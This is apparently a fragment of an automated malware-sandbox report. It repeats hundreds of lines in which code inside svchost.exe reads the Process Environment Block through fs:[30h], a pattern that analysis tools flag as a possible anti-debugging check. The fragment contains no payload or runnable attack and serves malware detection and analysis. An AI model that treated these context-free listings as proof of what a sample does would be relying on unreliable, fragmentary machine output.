            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D678E mov eax, dword ptr fs:[00000030h]1_2_030D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030307AF mov eax, dword ptr fs:[00000030h]1_2_030307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E47A0 mov eax, dword ptr fs:[00000030h]1_2_030E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C0 mov eax, dword ptr fs:[00000030h]1_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B07C3 mov eax, dword ptr fs:[00000030h]1_2_030B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE7E1 mov eax, dword ptr fs:[00000030h]1_2_030BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE609 mov eax, dword ptr fs:[00000030h]1_2_030AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072619 mov eax, dword ptr fs:[00000030h]1_2_03072619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E627 mov eax, dword ptr fs:[00000030h]1_2_0304E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066620 mov eax, dword ptr fs:[00000030h]1_2_03066620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068620 mov eax, dword ptr fs:[00000030h]1_2_03068620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303262C mov eax, dword ptr fs:[00000030h]1_2_0303262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304C640 mov eax, dword ptr fs:[00000030h]1_2_0304C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03062674 mov eax, dword ptr fs:[00000030h]1_2_03062674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C6A6 mov eax, dword ptr fs:[00000030h]1_2_0306C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030666B0 mov eax, dword ptr fs:[00000030h]1_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov eax, dword ptr fs:[00000030h]1_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6500 mov eax, dword ptr fs:[00000030h]1_2_030C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov eax, dword ptr fs:[00000030h]1_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov ecx, dword ptr fs:[00000030h]1_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064588 mov eax, dword ptr fs:[00000030h]1_2_03064588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E59C mov eax, dword ptr fs:[00000030h]1_2_0306E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030365D0 mov eax, dword ptr fs:[00000030h]1_2_030365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030325E0 mov eax, dword ptr fs:[00000030h]1_2_030325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C427 mov eax, dword ptr fs:[00000030h]1_2_0302C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA456 mov eax, dword ptr fs:[00000030h]1_2_030EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302645D mov eax, dword ptr fs:[00000030h]1_2_0302645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305245A mov eax, dword ptr fs:[00000030h]1_2_0305245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC460 mov ecx, dword ptr fs:[00000030h]1_2_030BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA49A mov eax, dword ptr fs:[00000030h]1_2_030EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030364AB mov eax, dword ptr fs:[00000030h]1_2_030364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030644B0 mov ecx, dword ptr fs:[00000030h]1_2_030644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BA4B0 mov eax, dword ptr fs:[00000030h]1_2_030BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030304E5 mov ecx, dword ptr fs:[00000030h]1_2_030304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104B00 mov eax, dword ptr fs:[00000030h]1_2_03104B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]1_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]1_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]1_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]1_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]1_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]1_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]1_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]1_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FAB40 mov eax, dword ptr fs:[00000030h]1_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D8B42 mov eax, dword ptr fs:[00000030h]1_2_030D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028B50 mov eax, dword ptr fs:[00000030h]1_2_03028B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEB50 mov eax, dword ptr fs:[00000030h]1_2_030DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302CB7E mov eax, dword ptr fs:[00000030h]1_2_0302CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]1_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]1_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]1_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]1_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]1_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]1_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]1_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEBD0 mov eax, dword ptr fs:[00000030h]1_2_030DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EBFC mov eax, dword ptr fs:[00000030h]1_2_0305EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BCBF0 mov eax, dword ptr fs:[00000030h]1_2_030BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BCA11 mov eax, dword ptr fs:[00000030h]1_2_030BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA24 mov eax, dword ptr fs:[00000030h]1_2_0306CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EA2E mov eax, dword ptr fs:[00000030h]1_2_0305EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]1_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]1_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]1_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]1_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEA60 mov eax, dword ptr fs:[00000030h]1_2_030DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]1_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]1_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104A80 mov eax, dword ptr fs:[00000030h]1_2_03104A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068A90 mov edx, dword ptr fs:[00000030h]1_2_03068A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]1_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]1_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086AA4 mov eax, dword ptr fs:[00000030h]1_2_03086AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030AD0 mov eax, dword ptr fs:[00000030h]1_2_03030AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]1_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]1_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]1_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]1_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h] | 1_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h] | 1_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030BC912 mov eax, dword ptr fs:[00000030h] | 1_2_030BC912
